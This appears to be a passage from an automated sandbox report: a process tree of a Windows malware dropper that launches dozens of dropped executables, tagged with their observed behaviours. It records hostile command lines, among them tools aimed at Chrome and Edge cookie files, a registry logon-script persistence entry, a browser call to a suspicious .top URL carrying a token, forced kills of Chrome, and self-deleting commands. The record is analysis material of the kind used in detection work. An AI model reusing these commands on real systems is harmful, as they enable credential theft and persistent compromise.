- Suspicious use of AdjustPrivilegeToken
PID:4564
-
-
-
C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe"C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exeC:\Users\Admin\Documents\gdCjIZ3vQLrTFWKdOezjL1wn.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4396
-
-
-
C:\Users\Admin\Documents\Jehn52WtbMKZ9kxobh4J4A03.exe"C:\Users\Admin\Documents\Jehn52WtbMKZ9kxobh4J4A03.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1184
-
-
C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe"C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe"2⤵
- Executes dropped EXE
PID:2160 -
C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe"C:\Users\Admin\Documents\Bl4aeKqISbgmfj5TPTrnlG3E.exe" -q3⤵PID:5032
-
-
-
C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe"C:\Users\Admin\Documents\0NKIqxJZOxkSqcoqQk5gff41.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2136
-
-
C:\Users\Admin\Documents\H_GAN4lymZYNIe2SYb1o6PjL.exe"C:\Users\Admin\Documents\H_GAN4lymZYNIe2SYb1o6PjL.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3820
-
-
C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe"C:\Users\Admin\Documents\9V6mnXHdynq1s7PpT244URZa.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3492
-
-
C:\Users\Admin\Documents\qhRWdCBRrOEeIDbo7QDZo256.exe"C:\Users\Admin\Documents\qhRWdCBRrOEeIDbo7QDZo256.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2624 -
C:\Users\Admin\AppData\Roaming\4726380.exe"C:\Users\Admin\AppData\Roaming\4726380.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3572
-
-
C:\Users\Admin\AppData\Roaming\7300426.exe"C:\Users\Admin\AppData\Roaming\7300426.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:1996 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵
- Executes dropped EXE
PID:4716
-
-
-
C:\Users\Admin\AppData\Roaming\2310645.exe"C:\Users\Admin\AppData\Roaming\2310645.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4468
-
-
-
C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"2⤵
- Executes dropped EXE
PID:4028 -
C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"C:\Users\Admin\Documents\oYJ4oarMVlCEKSuYDbZ6GPPw.exe"3⤵
- Modifies data under HKEY_USERS
PID:8236
-
-
-
C:\Users\Admin\Documents\Ls6HCRy7CjYIm6XRO_DMyU5M.exe"C:\Users\Admin\Documents\Ls6HCRy7CjYIm6XRO_DMyU5M.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 7603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 7843⤵
- Program crash
PID:3260
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 8203⤵
- Program crash
PID:4080
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 8563⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:2032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 9563⤵
- Program crash
PID:5176
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 9843⤵
- Program crash
PID:5484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 10203⤵
- Program crash
PID:5756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 14563⤵
- Program crash
PID:5940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 14963⤵
- Program crash
PID:5208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 15003⤵
- Program crash
PID:6116
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 16883⤵
- Program crash
PID:6136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 508 -s 14883⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:6064
-
-
-
C:\Users\Admin\Documents\MWJd3mPPIlWyLa2RpIzVqQrH.exe"C:\Users\Admin\Documents\MWJd3mPPIlWyLa2RpIzVqQrH.exe"2⤵
- Executes dropped EXE
PID:4492
-
-
C:\Users\Admin\Documents\5vpgJBjyfbnbMk1YeKUgbWC8.exe"C:\Users\Admin\Documents\5vpgJBjyfbnbMk1YeKUgbWC8.exe"2⤵
- Executes dropped EXE
PID:4612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 6603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 7163⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4728
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 6643⤵
- Program crash
PID:4544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 6683⤵
- Program crash
PID:2032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 11603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4212
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 11203⤵
- Program crash
PID:992
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 11123⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
-
C:\Users\Admin\Documents\Xdb1fFnJhrYC1plDJxt3VPoy.exe"C:\Users\Admin\Documents\Xdb1fFnJhrYC1plDJxt3VPoy.exe"2⤵
- Executes dropped EXE
PID:4948
-
-
C:\Users\Admin\Documents\yY2qmC4iOLBQc_v9oIAFRu3F.exe"C:\Users\Admin\Documents\yY2qmC4iOLBQc_v9oIAFRu3F.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4672 -
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:4832 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:3180
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5912
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2704
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:2520
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:2188
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:6016
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5524
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:5356
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4512 -s 15364⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1220
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5040
-
-
-
C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe"C:\Users\Admin\Documents\8md1vxAwe7Y0ndRiBYaafLjk.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:492
-
-
C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"2⤵
- Executes dropped EXE
PID:184 -
C:\Users\Admin\AppData\Local\Temp\is-6BVRA.tmp\DvMwGNgUky7bXWwCd2_zhu5C.tmp"C:\Users\Admin\AppData\Local\Temp\is-6BVRA.tmp\DvMwGNgUky7bXWwCd2_zhu5C.tmp" /SL5="$40266,138429,56832,C:\Users\Admin\Documents\DvMwGNgUky7bXWwCd2_zhu5C.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4372 -
C:\Users\Admin\AppData\Local\Temp\is-33Q2P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-33Q2P.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4444 -
C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"C:\Program Files (x86)\GameBox INC\GameBox\LGCH2-401_2021-08-18_14-40.exe"5⤵
- Executes dropped EXE
PID:5884 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 7526⤵
- Program crash
PID:6060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 7766⤵
- Program crash
PID:5964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 8006⤵
- Program crash
PID:7144
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵
- Executes dropped EXE
PID:5952 -
C:\Users\Admin\AppData\Local\Temp\is-2P2NR.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-2P2NR.tmp\Inlog.tmp" /SL5="$20254,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5280 -
C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:7400
-
C:\Users\Admin\AppData\Local\Temp\is-8GTL4.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-8GTL4.tmp\Setup.tmp" /SL5="$4028A,17369807,721408,C:\Users\Admin\AppData\Local\Temp\is-LRHL3.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7664 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:5556
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵
- Drops file in Windows directory
PID:7108
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:3508
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:3800
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵
- Checks computer location settings
PID:1176
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵
- Loads dropped DLL
PID:8416
-
-
C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler"9⤵PID:660
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-7TON9.tmp\{app}\vdi_compiler.exe"10⤵PID:2884
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 411⤵
- Runs ping.exe
PID:8292
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent5⤵
- Executes dropped EXE
PID:6068 -
C:\Users\Admin\AppData\Local\Temp\is-6A3OQ.tmp\WEATHER Manager.tmp"C:\Users\Admin\AppData\Local\Temp\is-6A3OQ.tmp\WEATHER Manager.tmp" /SL5="$401DE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5540 -
C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=7157⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:7324 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-5TLP3.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"8⤵PID:8524
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent5⤵
- Executes dropped EXE
PID:6108 -
C:\Users\Admin\AppData\Local\Temp\is-U04EQ.tmp\VPN.tmp"C:\Users\Admin\AppData\Local\Temp\is-U04EQ.tmp\VPN.tmp" /SL5="$20256,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:5616 -
C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe" /silent /subid=7207⤵PID:7972
-
C:\Users\Admin\AppData\Local\Temp\is-BQEBS.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-BQEBS.tmp\Setup.tmp" /SL5="$30288,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-1O307.tmp\Setup.exe" /silent /subid=7208⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:8052 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "9⤵PID:8392
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090110⤵
- Checks SCSI registry key(s)
PID:8436
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "9⤵PID:8864
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090110⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:7732
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3416
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install9⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2184
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5192
-
-
C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"C:\Program Files (x86)\GameBox INC\GameBox\askinstall53.exe"5⤵
- Executes dropped EXE
PID:5360 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:6836
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:6916
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵
- Executes dropped EXE
PID:5560 -
C:\Users\Admin\AppData\Roaming\5918109.exe"C:\Users\Admin\AppData\Roaming\5918109.exe"6⤵
- Executes dropped EXE
PID:5020
-
-
C:\Users\Admin\AppData\Roaming\4164647.exe"C:\Users\Admin\AppData\Roaming\4164647.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: SetClipboardViewer
PID:5744
-
-
C:\Users\Admin\AppData\Roaming\4417789.exe"C:\Users\Admin\AppData\Roaming\4417789.exe"6⤵
- Executes dropped EXE
PID:6320
-
-
C:\Users\Admin\AppData\Roaming\4278010.exe"C:\Users\Admin\AppData\Roaming\4278010.exe"6⤵
- Executes dropped EXE
PID:6240
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"5⤵PID:5636
-
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q6⤵
- Executes dropped EXE
PID:4520
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵PID:5420
-
C:\Users\Admin\AppData\Local\Temp\is-UEE73.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-UEE73.tmp\MediaBurner2.tmp" /SL5="$1030E,506086,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5032 -
C:\Users\Admin\AppData\Local\Temp\is-RG9UP.tmp\3377047_logo_media.exe"C:\Users\Admin\AppData\Local\Temp\is-RG9UP.tmp\3377047_logo_media.exe" /S /UID=burnerch27⤵PID:6276
-
C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe"C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe" /VERYSILENT8⤵PID:6208
-
C:\Users\Admin\AppData\Local\Temp\is-4QFNF.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-4QFNF.tmp\ultramediaburner.tmp" /SL5="$30294,281924,62464,C:\Program Files\MSBuild\XECLZJAKZJ\ultramediaburner.exe" /VERYSILENT9⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:7852 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:7916
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7e-dd116-ba9-f80ac-43521baecbf98\Gaemataeshani.exe"C:\Users\Admin\AppData\Local\Temp\7e-dd116-ba9-f80ac-43521baecbf98\Gaemataeshani.exe"8⤵
- Checks computer location settings
PID:772
-
-
C:\Users\Admin\AppData\Local\Temp\e8-c9bea-ea6-ed5b1-d27f02c38b513\Miruxatabu.exe"C:\Users\Admin\AppData\Local\Temp\e8-c9bea-ea6-ed5b1-d27f02c38b513\Miruxatabu.exe"8⤵PID:3504
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe /eufive & exit9⤵PID:6836
-
C:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\bu1exqmo.2tv\GcleanerEU.exe /eufive10⤵PID:8200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:8460
-
C:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exeC:\Users\Admin\AppData\Local\Temp\j0cdybvr.fey\installer.exe /qn CAMPAIGN="654"10⤵PID:8924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zqxe0sbg.plp\ufgaa.exe & exit9⤵PID:8780
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe & exit9⤵PID:8320
-
C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exeC:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe10⤵
- Suspicious use of AdjustPrivilegeToken
PID:4544 -
C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe"C:\Users\Admin\AppData\Local\Temp\fdlhlejl.wse\anyname.exe" -q11⤵PID:8600
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe /mixfive & exit9⤵PID:8968
-
C:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\3vbsshvs.egm\gcleaner.exe /mixfive10⤵PID:8172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3di1wj4c.u5s\autosubplayer.exe /S & exit9⤵
- Suspicious use of SetWindowsHookEx
PID:8892
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:6008 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629289462 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:6668
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"5⤵
- Executes dropped EXE
PID:5684 -
C:\Users\Admin\AppData\Local\Temp\tmpDB29_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpDB29_tmp.exe"6⤵PID:7152
-
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"7⤵PID:7636
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks7⤵PID:4900
-
C:\Windows\SysWOW64\cmd.execmd8⤵PID:6256
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks9⤵PID:6096
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comEsplorarne.exe.com i9⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5936 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i10⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5580 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i11⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i12⤵PID:6312
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i13⤵
- Suspicious use of SendNotifyMessage
PID:7352 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i14⤵
- Suspicious use of SendNotifyMessage
PID:8224 -
